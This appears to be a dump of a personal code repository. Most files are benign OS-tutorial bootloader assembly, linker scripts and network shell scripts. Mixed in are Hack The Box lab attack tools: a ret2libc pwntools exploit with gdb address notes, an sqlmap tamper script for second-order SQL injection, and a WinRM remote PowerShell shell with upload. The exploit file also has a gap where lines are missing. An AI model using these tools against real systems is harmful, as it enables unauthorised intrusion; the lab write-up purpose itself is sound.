*/ 8 | 9 | .rodata : { *(.rodata) } :read_only /* Initialized read-only data go here. */ 10 | 11 | .data : { *(.data) } :read_write /* Initialized data go here. */ 12 | 13 | /* BSS Section: Uninitialized data (like the stack) go here. */ 14 | /* This section is ONLY reserved in memory; nothing is written to the output file. */ 15 | .bss : { 16 | . = ALIGN(16); 17 | . = . + 0x10000; /* Reserve 64KB for the stack */ 18 | __stack_top = .; /* Set the label __stack_top to the end of the reserved space */ 19 | } :read_write 20 | 21 | /* /DISCARD/ section: Get rid of any unused/unwanted sections */ 22 | /DISCARD/ : { 23 | *(.note.gnu.build-id) 24 | *(.ARM.exidx) 25 | } 26 | } 27 | 28 | /* Define the loadable segments and set their permissions */ 29 | PHDRS { 30 | read_execute PT_LOAD FLAGS(5); /* R + X */ 31 | read_only PT_LOAD FLAGS(4); /* R */ 32 | read_write PT_LOAD FLAGS(6); /* R + W */ 33 | } 34 | -------------------------------------------------------------------------------- /crypto/xor_encrypted_text.bin: -------------------------------------------------------------------------------- 1 | Vr!aC=59R N2VZ!Y6K ._#^?=!ekPL0]7' 2 | Z|e=- I%VP='V &e-O9V^7 3 | R7e*]YC%VT' @6e9U(A% VC9+<]YU(]r ;VC9 kPO`Vr 6E3)/Yh4" :^ GU)]3?JC;+3CO3E7WsrC!,;_2C7'Z 5e,aY )XV|Y&@ 4 | <"T?[3^7Y8Vr#9N2V\"!R;*k\4Vr;\7e*G`Z"6AC;6T?[S%\ s@ ? "^R`@7sU e"WO'VZ<P-A7Y V'7kG@.VD:=: .R`V+Y!V71?ZO`Z&:]C3e.@ 9 | @'r.;V r1.D9G 2^C;6T,VD2G7sQr$T;@T$ =W ?e>^D2VT76A&*g I%VA7 10 | &_r,kRYR4V3sP 11 | "-9Yv)[rsX+e#R )& &_r7%WLlVG:sA!0?R`=6;(kCElVD:0[C;6T>]S%X3?VC73%O`[7!JMXO=%O9V\4Y'[! T(Z I%@~Y'[r;Q%R&! 
12 | !e>_D2Q>sG r$T ]V.[C>:]7=kR U!X~Y Z 1 T;_H.V* sk,e"CD2V* sC9 e0U`@r?@ r1"E@,VG=Y5_ 13 | "e9QU2A+Y1Z!e% I%VW7!J& kC@)G7'+e*]Q5R&=TC&-kPQ(A&+GMr"@YH3VP3?Vr('_@"_; * -------------------------------------------------------------------------------- /linker.ld: -------------------------------------------------------------------------------- 1 | /* Linker Script: Defines the memory layout */ 2 | 3 | ENTRY(_start) 4 | 5 | SECTIONS { 6 | . = 0x80000; /* The kernel code must start at the address 0x80000 for Raspberry Pi. */ 7 | .text : { *(.text) } :read_execute_segment /* Code goes here. */ 8 | 9 | .rodata : { *(.rodata) } :read_only_segment /* Initialized read-only data go here. */ 10 | 11 | .data : { *(.data) } :read_write_segment /* Initialized data go here. */ 12 | 13 | /* BSS Section: Uninitialized data (like the stack) go here. */ 14 | /* This section is ONLY reserved in memory; nothing is written to the output file. */ 15 | .bss : { 16 | . = ALIGN(16); 17 | . = . + 0x10000; /* Reserve 64KB for the stack */ 18 | __stack_top = .; /* Set the label __stack_top to the end of the reserved space */ 19 | } :read_write_segment 20 | 21 | /* /DISCARD/ section: Get rid of any unused/unwanted sections */ 22 | /DISCARD/ : { 23 | *(.note.gnu.build-id) 24 | *(.ARM.exidx) 25 | } 26 | } 27 | 28 | /* Define the loadable segments and set their permissions */ 29 | PHDRS { 30 | read_execute_segment PT_LOAD FLAGS(5); /* R + X */ 31 | read_only_segment PT_LOAD FLAGS(4); /* R */ 32 | read_write_segment PT_LOAD FLAGS(6); /* R + W */ 33 | } 34 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | This is free and unencumbered software released into the public domain. 
2 | 3 | Anyone is free to copy, modify, publish, use, compile, sell, or 4 | distribute this software, either in source code form or as a compiled 5 | binary, for any purpose, commercial or non-commercial, and by any 6 | means. 7 | 8 | In jurisdictions that recognize copyright laws, the author or authors 9 | of this software dedicate any and all copyright interest in the 10 | software to the public domain. We make this dedication for the benefit 11 | of the public at large and to the detriment of our heirs and 12 | successors. We intend this dedication to be an overt act of 13 | relinquishment in perpetuity of all present and future rights to this 14 | software under copyright law. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 17 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 18 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 19 | IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR 20 | OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, 21 | ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR 22 | OTHER DEALINGS IN THE SOFTWARE. 
23 | 24 | For more information, please refer to 25 | -------------------------------------------------------------------------------- /hg_git/hg-init-bitbucket-repo: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ "$#" -ne 2 ]; then 4 | echo "Usage: ${0##*/} bitbucket_username(not email) repository_name" >&2 5 | exit 1 6 | fi 7 | username="$1" 8 | reponame="$2" 9 | printf "\nPlease insert Bitbucket password: " 10 | read -s password 11 | 12 | #Create repo using curl and Bitbucket REST API v2.0 13 | curl -X POST -v -u $username:$password -H "Content-Type: application/json" \ 14 | https://api.bitbucket.org/2.0/repositories/$username/$reponame \ 15 | -d '{"scm": "hg", "is_private": "true", "fork_policy": "no_public_forks" }' 16 | 17 | printf "\nRemote repository https://$username@bitbucket.org/$username/$reponame created\n\n" 18 | 19 | hg init 20 | hg add 21 | hg commit -m "Initial automatic commit $(date)" 22 | 23 | echo \[paths\] >> .hg/hgrc 24 | echo default = https://$username@bitbucket.org/$username/$reponame >> .hg/hgrc 25 | echo \[ui\] >> .hg/hgrc 26 | echo username = $username >> .hg/hgrc 27 | echo \[auth\] >> .hg/hgrc 28 | echo bb.prefix = https://bitbucket.org >> .hg/hgrc 29 | echo bb.username = $username >> .hg/hgrc 30 | 31 | #If you want to store the password uncomment the next line 32 | #echo bb.password = $password >> .hg/hgrc 33 | 34 | hg push https://$username:$password@bitbucket.org/$username/$reponame 35 | 36 | printf "\nFinished\n\n" 37 | -------------------------------------------------------------------------------- /hacking/HTB/Enterprise/pwn_lcars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # Author: Alamot 3 | import time 4 | import struct 5 | from pwn import * 6 | from subprocess import call 7 | 8 | #context(os = 'linux', arch = 'i386') 9 | DEBUG = False 10 | RHOST = "10.10.10.61" 11 | RPORT = 32812 12 | 13 | if 
DEBUG: 14 | context.log_level = 'debug' 15 | else: 16 | context.log_level = 'info' 17 | 18 | def conv(num): 19 | return struct.pack(" *) 0xf7e4c060 40 | 41 | (gdb) print &exit 42 | $2 = ( *) 0xf7e3faf0 43 | 44 | find &system,+9999999,"/bin/sh" 45 | 0xf7f70a0f #<---- THIS NOT GOOD. IT HAS NEWLINE (0a) # 46 | 47 | # So we search for plain 'sh' 48 | (gdb) find &system,+9999999,"sh" 49 | 0xf7f6ddd5 50 | 0xf7f6e7e1 51 | 0xf7f70a14 52 | 0xf7f72582 53 | ''' 54 | -------------------------------------------------------------------------------- /os/part2/stage2/bootstage2.asm: -------------------------------------------------------------------------------- 1 | ; Author: Alamot 2 | 3 | BITS 16 4 | 5 | ;---Initialized data------------------------------------------------------------ 6 | stage2_message dw 19 7 | db 'Entering Stage 2...' 8 | longmode_supported_message dw 23 9 | db 'Long mode is supported.' 10 | longmode_not_supported_message dw 27 11 | db 'Long mode is not supported.' 12 | 13 | ;---Code------------------------------------------------------------------------ 14 | Stage2_entrypoint: 15 | ; Print 'Entering Stage 2...' message 16 | mov si, stage2_message 17 | call Real_mode_println 18 | 19 | ; Check if long mode is supported 20 | call Is_longmode_supported 21 | test eax, eax 22 | jz .long_mode_not_supported 23 | mov si, longmode_supported_message 24 | call Real_mode_println 25 | 26 | ; Enable Gate A20 27 | call Enable_A20 28 | ; Prepare paging 29 | call Prepare_paging 30 | ; Remap PIC 31 | call Remap_PIC 32 | ; Enter long mode 33 | call Enter_long_mode 34 | 35 | .long_mode_not_supported: 36 | mov si, longmode_not_supported_message 37 | call Real_mode_println 38 | .halt: hlt ; Infinite loop. 39 | jmp .halt ; (It prevents from going off in memory and executing junk). 
40 | 41 | 42 | ; Include 43 | %include "stage2/a20.asm" 44 | %include "stage2/paging.asm" 45 | %include "stage2/pic.asm" 46 | %include "stage2/longmode.asm" 47 | 48 | -------------------------------------------------------------------------------- /os/part3/stage2/bootstage2.asm: -------------------------------------------------------------------------------- 1 | BITS 16 2 | 3 | ;---Initialized data------------------------------------------------------------ 4 | stage2_message dw 19 5 | db 'Entering Stage 2...' 6 | longmode_supported_message dw 23 7 | db 'Long mode is supported.' 8 | longmode_not_supported_message dw 27 9 | db 'Long mode is not supported.' 10 | 11 | ;---Code------------------------------------------------------------------------ 12 | Stage2_entrypoint: 13 | ; Print 'Entering Stage 2...' message 14 | mov si, stage2_message 15 | call Real_mode_println 16 | 17 | ; Check if long mode is supported 18 | call Is_longmode_supported 19 | test eax, eax 20 | jz .long_mode_not_supported 21 | mov si, longmode_supported_message 22 | call Real_mode_println 23 | 24 | ; Enable Gate A20 25 | call Enable_A20 26 | ; Prepare paging 27 | call Prepare_paging 28 | ; Remap PIC 29 | call Remap_PIC 30 | ; Enter long mode 31 | call Enter_long_mode 32 | 33 | .long_mode_not_supported: 34 | mov si, longmode_not_supported_message 35 | call Real_mode_println 36 | .halt: hlt ; Infinite loop. 37 | jmp .halt ; (It prevents us from going off in memory and executing junk). 38 | 39 | 40 | ; Include 41 | %include "stage2/a20.asm" 42 | %include "stage2/paging.asm" 43 | %include "stage2/pic.asm" 44 | %include "stage2/longmode.asm" 45 | 46 | -------------------------------------------------------------------------------- /os/part4/stage2/bootstage2.asm: -------------------------------------------------------------------------------- 1 | BITS 16 2 | 3 | ;---Initialized data------------------------------------------------------------ 4 | stage2_message dw 19 5 | db 'Entering Stage 2...' 
6 | longmode_supported_message dw 23 7 | db 'Long mode is supported.' 8 | longmode_not_supported_message dw 27 9 | db 'Long mode is not supported.' 10 | 11 | ;---Code------------------------------------------------------------------------ 12 | Stage2_entrypoint: 13 | ; Print 'Entering Stage 2...' message 14 | mov si, stage2_message 15 | call Real_mode_println 16 | 17 | ; Check if long mode is supported 18 | call Is_longmode_supported 19 | test eax, eax 20 | jz .long_mode_not_supported 21 | mov si, longmode_supported_message 22 | call Real_mode_println 23 | 24 | ; Enable Gate A20 25 | call Enable_A20 26 | ; Prepare paging 27 | call Prepare_paging 28 | ; Remap PIC 29 | call Remap_PIC 30 | ; Enter long mode 31 | call Enter_long_mode 32 | 33 | .long_mode_not_supported: 34 | mov si, longmode_not_supported_message 35 | call Real_mode_println 36 | .halt: hlt ; Infinite loop. 37 | jmp .halt ; (It prevents us from going off in memory and executing junk). 38 | 39 | 40 | ; Include 41 | %include "stage2/a20.asm" 42 | %include "stage2/paging.asm" 43 | %include "stage2/pic.asm" 44 | %include "stage2/longmode.asm" 45 | 46 | -------------------------------------------------------------------------------- /os/part5/stage2/bootstage2.asm: -------------------------------------------------------------------------------- 1 | ; Author: Alamot 2 | 3 | BITS 16 4 | 5 | ;---Initialized data------------------------------------------------------------ 6 | stage2_message dw 19 7 | db 'Entering Stage 2...' 8 | longmode_supported_message dw 23 9 | db 'Long mode is supported.' 10 | longmode_not_supported_message dw 27 11 | db 'Long mode is not supported.' 12 | 13 | ;---Code------------------------------------------------------------------------ 14 | Stage2_entrypoint: 15 | ; Print 'Entering Stage 2...' 
message 16 | mov si, stage2_message 17 | call Real_mode_println 18 | 19 | ; Get memory map 20 | call Get_E820_map 21 | 22 | ; Check if long mode is supported 23 | call Is_longmode_supported 24 | test eax, eax 25 | jz .long_mode_not_supported 26 | mov si, longmode_supported_message 27 | call Real_mode_println 28 | 29 | ; Enable Gate A20 30 | call Enable_A20 31 | ; Prepare paging 32 | call Prepare_paging 33 | ; Remap PIC 34 | call Remap_PIC 35 | ; Enter long mode 36 | call Enter_long_mode 37 | 38 | .long_mode_not_supported: 39 | mov si, longmode_not_supported_message 40 | call Real_mode_println 41 | .halt: hlt ; Infinite loop. 42 | jmp .halt ; (It prevents us from going off in memory and executing junk). 43 | 44 | 45 | ; Include 46 | %include "stage2/e280_mapping.asm" 47 | %include "stage2/a20.asm" 48 | %include "stage2/paging.asm" 49 | %include "stage2/pic.asm" 50 | %include "stage2/longmode.asm" 51 | 52 | -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/SutherlandHodgman.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31729.503 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SutherlandHodgman", "SutherlandHodgman.vcxproj", "{90409165-B065-4780-91B7-0A9B2DE8B5BA}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Debug|x64.ActiveCfg = Debug|x64 17 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Debug|x64.Build.0 = Debug|x64 18 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Debug|x86.ActiveCfg = 
Debug|Win32 19 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Debug|x86.Build.0 = Debug|Win32 20 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Release|x64.ActiveCfg = Release|x64 21 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Release|x64.Build.0 = Release|x64 22 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Release|x86.ActiveCfg = Release|Win32 23 | {90409165-B065-4780-91B7-0A9B2DE8B5BA}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {328559D7-EEB7-43F9-A123-0A0E88A26B65} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /winrm/winrm_shell_with_upload.rb: -------------------------------------------------------------------------------- 1 | require 'winrm-fs' 2 | 3 | # Author: Alamot 4 | # To upload a file type: UPLOAD local_path remote_path 5 | # e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt 6 | 7 | conn = WinRM::Connection.new( 8 | endpoint: 'https://IP:PORT/wsman', 9 | transport: :ssl, 10 | user: 'username', 11 | password: 'password', 12 | :no_ssl_peer_verification => true 13 | ) 14 | 15 | file_manager = WinRM::FS::FileManager.new(conn) 16 | 17 | 18 | class String 19 | def tokenize 20 | self. 21 | split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/). 22 | select {|s| not s.empty? }. 
23 | map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')} 24 | end 25 | end 26 | 27 | 28 | command="" 29 | 30 | conn.shell(:powershell) do |shell| 31 | until command == "exit\n" do 32 | output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')") 33 | print(output.output.chomp) 34 | command = gets 35 | if command.start_with?('UPLOAD') then 36 | upload_command = command.tokenize 37 | print("Uploading " + upload_command[1] + " to " + upload_command[2]) 38 | file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path| 39 | puts("#{bytes_copied} bytes of #{total_bytes} bytes copied") 40 | end 41 | command = "echo `nOK`n" 42 | end 43 | 44 | output = shell.run(command) do |stdout, stderr| 45 | STDOUT.print(stdout) 46 | STDERR.print(stderr) 47 | end 48 | end 49 | puts("Exiting with code #{output.exitcode}") 50 | end 51 | 52 | -------------------------------------------------------------------------------- /hacking/HTB/Nightmare/nightmare_tamper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Author: Alamot 3 | import re 4 | import requests 5 | from lib.core.enums import PRIORITY 6 | from random import sample 7 | __priority__ = PRIORITY.NORMAL 8 | 9 | def dependencies(): 10 | pass 11 | 12 | def new_cookie(payload): 13 | session = requests.Session() 14 | paramsPost = {"register":"Register", "pass":"pass", "user":payload} 15 | headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0","Referer":"http://10.10.10.66/register.php","Connection":"close","Accept-Language":"en-US,en;q=0.5","Content-Type":"application/x-www-form-urlencoded"} 16 | response = session.post("http://10.10.10.66/register.php", data=paramsPost, headers=headers) 17 | result = re.search('PHPSESSID=(.*?);', response.headers['Set-Cookie']) 18 | 
PHPSESSID = result.group(1) 19 | 20 | paramsPost = {"login":"Login", "pass":"pass", "user":payload} 21 | headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0","Referer":"http://10.10.10.66/index.php","Connection":"close","Accept-Language":"en-US,en;q=0.5","Content-Type":"application/x-www-form-urlencoded"} 22 | response = session.post("http://10.10.10.66/index.php", data=paramsPost, headers=headers) 23 | 24 | return "PHPSESSID="+PHPSESSID 25 | 26 | def tamper(payload, **kwargs): 27 | headers = kwargs.get("headers", {}) 28 | headers["Cookie"] = new_cookie(payload) 29 | #print(headers, payload) 30 | return payload 31 | -------------------------------------------------------------------------------- /os/part2/stage1/print.asm: -------------------------------------------------------------------------------- 1 | BITS 16 2 | 3 | ;---Initialized data------------------------------------------------------------ 4 | 5 | newline dw 2 6 | db 13,10 ; \r\n 7 | 8 | stage1_message dw 17 9 | db 'Stage 1 finished.' 10 | 11 | ;---Code------------------------------------------------------------------------ 12 | 13 | Real_mode_print: 14 | ;*********************************************************************************; 15 | ; Prints a string (in real mode) ; 16 | ;---------------------------------------------------------------------------------; 17 | ; si: pointer to string (first 16 bits = the number of characters in the string.) 
; 18 | ;*********************************************************************************; 19 | push ax 20 | push cx 21 | push si 22 | mov cx, word [si] ; first 16 bits = the number of characters in the string 23 | add si, 2 24 | .string_loop: ; print all the characters in the string 25 | lodsb 26 | mov ah, 0eh 27 | int 10h 28 | loop .string_loop, cx 29 | pop si 30 | pop cx 31 | pop ax 32 | ret 33 | 34 | 35 | Real_mode_println: 36 | ;***********************************************************; 37 | ; Prints a string (in real mode) and a newline (\r\n) ; 38 | ;-----------------------------------------------------------; 39 | ; si: pointer to string ; 40 | ; (first 16 bits = the number of characters in the string.) ; 41 | ;***********************************************************; 42 | push si 43 | call Real_mode_print 44 | mov si, newline 45 | call Real_mode_print 46 | pop si 47 | ret 48 | -------------------------------------------------------------------------------- /os/part3/stage1/print.asm: -------------------------------------------------------------------------------- 1 | BITS 16 2 | 3 | ;---Initialized data------------------------------------------------------------ 4 | 5 | newline dw 2 6 | db 13,10 ; \r\n 7 | 8 | stage1_message dw 17 9 | db 'Stage 1 finished.' 10 | 11 | ;---Code------------------------------------------------------------------------ 12 | 13 | Real_mode_print: 14 | ;*********************************************************************************; 15 | ; Prints a string (in real mode) ; 16 | ;---------------------------------------------------------------------------------; 17 | ; si: pointer to string (first 16 bits = the number of characters in the string.) 
; 18 | ;*********************************************************************************; 19 | push ax 20 | push cx 21 | push si 22 | mov cx, word [si] ; first 16 bits = the number of characters in the string 23 | add si, 2 24 | .string_loop: ; print all the characters in the string 25 | lodsb 26 | mov ah, 0eh 27 | int 10h 28 | loop .string_loop, cx 29 | pop si 30 | pop cx 31 | pop ax 32 | ret 33 | 34 | 35 | Real_mode_println: 36 | ;***********************************************************; 37 | ; Prints a string (in real mode) and a newline (\r\n) ; 38 | ;-----------------------------------------------------------; 39 | ; si: pointer to string ; 40 | ; (first 16 bits = the number of characters in the string.) ; 41 | ;***********************************************************; 42 | push si 43 | call Real_mode_print 44 | mov si, newline 45 | call Real_mode_print 46 | pop si 47 | ret 48 | -------------------------------------------------------------------------------- /os/part4/stage1/print.asm: -------------------------------------------------------------------------------- 1 | BITS 16 2 | 3 | ;---Initialized data------------------------------------------------------------ 4 | 5 | newline dw 2 6 | db 13,10 ; \r\n 7 | 8 | stage1_message dw 17 9 | db 'Stage 1 finished.' 10 | 11 | ;---Code------------------------------------------------------------------------ 12 | 13 | Real_mode_print: 14 | ;*********************************************************************************; 15 | ; Prints a string (in real mode) ; 16 | ;---------------------------------------------------------------------------------; 17 | ; si: pointer to string (first 16 bits = the number of characters in the string.) 
; 18 | ;*********************************************************************************; 19 | push ax 20 | push cx 21 | push si 22 | mov cx, word [si] ; first 16 bits = the number of characters in the string 23 | add si, 2 24 | .string_loop: ; print all the characters in the string 25 | lodsb 26 | mov ah, 0eh 27 | int 10h 28 | loop .string_loop, cx 29 | pop si 30 | pop cx 31 | pop ax 32 | ret 33 | 34 | 35 | Real_mode_println: 36 | ;***********************************************************; 37 | ; Prints a string (in real mode) and a newline (\r\n) ; 38 | ;-----------------------------------------------------------; 39 | ; si: pointer to string ; 40 | ; (first 16 bits = the number of characters in the string.) ; 41 | ;***********************************************************; 42 | push si 43 | call Real_mode_print 44 | mov si, newline 45 | call Real_mode_print 46 | pop si 47 | ret 48 | -------------------------------------------------------------------------------- /os/part1/stage1/print.asm: -------------------------------------------------------------------------------- 1 | BITS 16 2 | 3 | ;---Initialized data------------------------------------------------------------ 4 | 5 | newline dw 2 6 | db 13,10 ; \r\n 7 | 8 | stage1_message dw 17 9 | db 'Stage 1 finished.' 10 | 11 | ;---Code------------------------------------------------------------------------ 12 | 13 | Real_mode_print: 14 | ;*********************************************************************************; 15 | ; Prints a string (in real mode) ; 16 | ;---------------------------------------------------------------------------------; 17 | ; si: pointer to string (first 16 bits = the number of characters in the string.) 
; 18 | ;*********************************************************************************; 19 | push ax 20 | push cx 21 | push si 22 | mov cx, word [si] ; first 16 bits = the number of characters in the string 23 | add si, 2 24 | .string_loop: ; print all the characters in the string 25 | lodsb 26 | mov ah, 0eh 27 | int 10h 28 | loop .string_loop, cx 29 | pop si 30 | pop cx 31 | pop ax 32 | ret 33 | 34 | 35 | Real_mode_println: 36 | ;***********************************************************; 37 | ; Prints a string (in real mode) and a newline (\r\n) ; 38 | ;-----------------------------------------------------------; 39 | ; si: pointer to string ; 40 | ; (first 16 bits = the number of characters in the string.) ; 41 | ;***********************************************************; 42 | push si 43 | call Real_mode_print 44 | mov si, newline 45 | call Real_mode_print 46 | pop si 47 | ret 48 | -------------------------------------------------------------------------------- /share_internet/share_internet_simpe.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ "$#" -ne 2 ]; then 3 | echo "Usage: $0 WAN_interface LAN_interface" >&2 4 | exit 1 5 | fi 6 | WAN="$1" 7 | LAN="$2" 8 | echo Trying to share $WAN internet connection with $LAN ... 
9 | # Kill previous dnsmasq to avoid conflicts 10 | sudo killall dnsmasq 11 | # Set the IP of our would-be LAN gateway 12 | sudo ifconfig $LAN down 13 | sudo ifconfig $LAN 10.0.0.1 netmask 255.255.255.0 broadcast 10.0.0.255 14 | sudo ifconfig $LAN up 15 | # Or using the ip command 16 | # ip link set $LAN down 17 | # ip addr add 10.0.0.1/24 broadcast 10.0.0.255 dev $LAN 18 | # ip link set $LAN up 19 | 20 | # Inform the kernel that IP forwarding is OK: 21 | echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null 22 | for f in /proc/sys/net/ipv4/conf/*/rp_filter ; do echo 1 | sudo tee $f > /dev/null; done 23 | echo 1 | sudo tee /proc/sys/net/ipv4/ip_dynaddr > /dev/null 24 | 25 | # Flush the current ΝΑΤ rules: 26 | sudo iptables -t nat -F 27 | sudo iptables -t nat -X 28 | 29 | # Accept traffic via ports 67 (dhcp) and 53 (dns) from LAN 30 | sudo iptables -I INPUT -i $LAN -j ACCEPT 31 | sudo iptables -I INPUT -p udp --dport 67 -i $LAN -j ACCEPT 32 | sudo iptables -I INPUT -p udp --dport 53 -i $LAN -j ACCEPT 33 | sudo iptables -I INPUT -p tcp --dport 53 -i $LAN -j ACCEPT 34 | 35 | # Add the rules for NAT: 36 | sudo iptables -t nat -A POSTROUTING -o $WAN -j MASQUERADE 37 | sudo iptables -A FORWARD -i $LAN -o $WAN -j ACCEPT 38 | sudo iptables -A FORWARD -i $WAN -o $LAN -m state --state RELATED,ESTABLISHED -j ACCEPT 39 | 40 | # dnsmasq provides the dhcp and dns servers 41 | sudo dnsmasq -i $LAN --dhcp-range=$LAN,10.0.0.100,10.0.0.250,72h 42 | echo Internet connection sharing is READY. 43 | -------------------------------------------------------------------------------- /os/part5/stage1/print.asm: -------------------------------------------------------------------------------- 1 | ; Author: Alamot 2 | 3 | BITS 16 4 | 5 | ;---Initialized data------------------------------------------------------------ 6 | 7 | newline dw 2 8 | db 13,10 ; \r\n 9 | 10 | stage1_message dw 17 11 | db 'Stage 1 finished.' 
12 | 13 | ;---Code------------------------------------------------------------------------ 14 | 15 | Real_mode_print: 16 | ;*********************************************************************************; 17 | ; Prints a string (in real mode) ; 18 | ;---------------------------------------------------------------------------------; 19 | ; si: pointer to string (first 16 bits = the number of characters in the string.) ; 20 | ;*********************************************************************************; 21 | push ax 22 | push cx 23 | push si 24 | mov cx, word [si] ; first 16 bits = the number of characters in the string 25 | add si, 2 26 | .string_loop: ; print all the characters in the string 27 | lodsb 28 | mov ah, 0eh 29 | int 10h 30 | loop .string_loop, cx 31 | pop si 32 | pop cx 33 | pop ax 34 | ret 35 | 36 | 37 | Real_mode_println: 38 | ;***********************************************************; 39 | ; Prints a string (in real mode) and a newline (\r\n) ; 40 | ;-----------------------------------------------------------; 41 | ; si: pointer to string ; 42 | ; (first 16 bits = the number of characters in the string.) ; 43 | ;***********************************************************; 44 | push si 45 | call Real_mode_print 46 | mov si, newline 47 | call Real_mode_print 48 | pop si 49 | ret 50 | -------------------------------------------------------------------------------- /os/part3/stage2/longmode.asm: -------------------------------------------------------------------------------- 1 | BITS 16 2 | 3 | ;---Code------------------------------------------------------------------------ 4 | Is_longmode_supported: 5 | ;********************************************************************; 6 | ; Check if Long mode is supported ; 7 | ;--------------------------------------------------------------------; 8 | ; Returns: eax = 0 if Long mode is NOT supported, else non-zero. 
; 9 | ;********************************************************************; 10 | mov eax, 0x80000000 ; Test if extended processor info in available. 11 | cpuid 12 | cmp eax, 0x80000001 13 | jb .not_supported 14 | 15 | mov eax, 0x80000001 ; After calling CPUID with EAX = 0x80000001, 16 | cpuid ; all AMD64 compliant processors have the longmode-capable-bit 17 | test edx, (1 << 29) ; (bit 29) turned on in the EDX (extended feature flags). 18 | 19 | jz .not_supported ; If it's not set, there is no long mode. 20 | ret 21 | 22 | .not_supported: 23 | xor eax, eax 24 | ret 25 | 26 | 27 | Enter_long_mode: 28 | ;********************************************************************; 29 | ; Enter long mode ; 30 | ;********************************************************************; 31 | mov edi, PAGING_DATA; Point edi at the PAGING_DATA. 32 | mov eax, 10100000b ; Set the PAE and PGE bit. 33 | mov cr4, eax 34 | mov edx, edi ; Point CR3 at the PML4. 35 | mov cr3, edx 36 | mov ecx, 0xC0000080 ; Read from the EFER MSR. 37 | rdmsr 38 | or eax, 0x00000100 ; Set the LME bit. 39 | wrmsr 40 | mov ebx, cr0 ; Activate long mode 41 | or ebx,0x80000001 ; by enabling paging and protection simultaneously. 42 | mov cr0, ebx 43 | lgdt [GDT.Pointer] ; Load GDT.Pointer. 44 | jmp CODE_SEG:Kernel ; Load CS with 64 bit segment and flush the instruction cache. 45 | -------------------------------------------------------------------------------- /os/part4/stage2/longmode.asm: -------------------------------------------------------------------------------- 1 | BITS 16 2 | 3 | ;---Code------------------------------------------------------------------------ 4 | Is_longmode_supported: 5 | ;********************************************************************; 6 | ; Check if Long mode is supported ; 7 | ;--------------------------------------------------------------------; 8 | ; Returns: eax = 0 if Long mode is NOT supported, else non-zero. 
; 9 | ;********************************************************************; 10 | mov eax, 0x80000000 ; Test if extended processor info in available. 11 | cpuid 12 | cmp eax, 0x80000001 13 | jb .not_supported 14 | 15 | mov eax, 0x80000001 ; After calling CPUID with EAX = 0x80000001, 16 | cpuid ; all AMD64 compliant processors have the longmode-capable-bit 17 | test edx, (1 << 29) ; (bit 29) turned on in the EDX (extended feature flags). 18 | 19 | jz .not_supported ; If it's not set, there is no long mode. 20 | ret 21 | 22 | .not_supported: 23 | xor eax, eax 24 | ret 25 | 26 | 27 | Enter_long_mode: 28 | ;********************************************************************; 29 | ; Enter long mode ; 30 | ;********************************************************************; 31 | mov edi, PAGING_DATA; Point edi at the PAGING_DATA. 32 | mov eax, 10100000b ; Set the PAE and PGE bit. 33 | mov cr4, eax 34 | mov edx, edi ; Point CR3 at the PML4. 35 | mov cr3, edx 36 | mov ecx, 0xC0000080 ; Read from the EFER MSR. 37 | rdmsr 38 | or eax, 0x00000100 ; Set the LME bit. 39 | wrmsr 40 | mov ebx, cr0 ; Activate long mode 41 | or ebx,0x80000001 ; by enabling paging and protection simultaneously. 42 | mov cr0, ebx 43 | lgdt [GDT.Pointer] ; Load GDT.Pointer. 44 | jmp CODE_SEG:Kernel ; Load CS with 64 bit segment and flush the instruction cache. 45 | -------------------------------------------------------------------------------- /os/part5/stage2/longmode.asm: -------------------------------------------------------------------------------- 1 | ; Author: Alamot 2 | 3 | BITS 16 4 | 5 | 